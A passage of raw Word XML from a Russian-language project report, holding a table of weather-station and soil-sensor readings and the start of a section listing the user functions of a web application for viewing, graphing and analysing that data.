                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="17B3338F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="410"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3114" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01B5535C" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Солнечное излучение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="244B92B4" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>512</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0247CDEA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>мВ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="75167909"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50CDB0DB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Влажность воздуха</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E06A7B8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>55.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="605D446A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="2BEB20D1"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7A2E4900" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Температура воздуха</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CB37338" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>23.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6B580CAC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="2529C862"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7656AEFD" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Направление ветра</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="76842188" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="460767E6" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>градусы</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="1DDA5B32"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4EF92BAC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Скорость ветра</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="480D37AE" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>44</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E1DF204" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>м/с</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0093378B" w:rsidRPr="0066369B" w14:paraId="298D6A09"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5CE95B8A" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Влагомер (5 каналов измерения влажности и температуры почвы на разных глубинах)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4103" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F6996D2" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Глубина 100 см: 15.5%, 15.44 </w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10CBE064" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Глубина 50 см: 8.04%, 16.88 </w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786C1798" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Глубина 30 см: 9.97%, 18.00 </w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D2160E" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Глубина 20 см: 12.64%, 19.38 </w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A51065" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Глубина 10 см: 14.07%, 22.00 </w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2208" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2272CF74" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="0066369B" w:rsidRDefault="0093378B" w:rsidP="0066369B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">см, %, </w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0066369B">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>С</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3129AD64" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00B10A09" w:rsidRDefault="0093378B" w:rsidP="00B10A09"/>
    <w:p w14:paraId="26EDB22B" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00CF5577" w:rsidRDefault="0093378B" w:rsidP="00CF5577">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc161568215"/>
      <w:bookmarkStart w:id="40" w:name="_Toc162709241"/>
      <w:r w:rsidRPr="00CF5577">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Программное обеспечение проекта</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="07D8D120" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:r>
        <w:t>Основной функционал приложения веб-сервера разработан в соответствии с требованиями заказчика, формулирование технических нюансов и организация графического пользовательского интерфейса были делегированы разработчику. Но тем не менее, программа должна реализовывать конкретные функции, описанные ниже. Функции разделены на пользовательские и администраторские, где под пользователем подразумевается любой посетитель веб-сайта, а под администратором – лицо, у которого есть право разработки, поддержки, модерации и масштабирования системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB6044" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00541C36" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Пользовательские функции приложения:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3208C78D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>просмотр информации о погодных и почвенных данных в течении определённой даты;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC4491" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>возможность выбора даты, за которую необходимо отобразить данные метеостанции и почвенных датчиков;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F2812" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>возможность выбора нескольких дат, за которые необходимо отобразить данные, должно присутствовать два варианта – показать данные, полученные за один день или показать данные, полученные за три предыдущих дня от выбранной даты;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F119A0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>просмотр следующих наблюдений:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1770D5DC" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008F53E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1560" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>температура воздуха;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC91E61" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008F53E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1560" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>влажность воздуха;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="649F57B0" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008F53E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1560" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>температура почвы;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3DCB8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008F53E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1560" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>скорость ветра;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59675A41" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008F53E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1560" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>направление ветра;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFE6087" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="008F53E6">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1560" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>влажность почвы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA10FA" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>просмотр информации в виде графика, где по оси абсцисс – время, по оси ординат – соответствующее данному графику наблюдение;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FA436D" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>просмотр информации в табличном виде;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F98923" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004802A1">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:t>возможность проведения однофакторного дисперсионного анализа.</w:t>
      </w:r>
    </w:p>
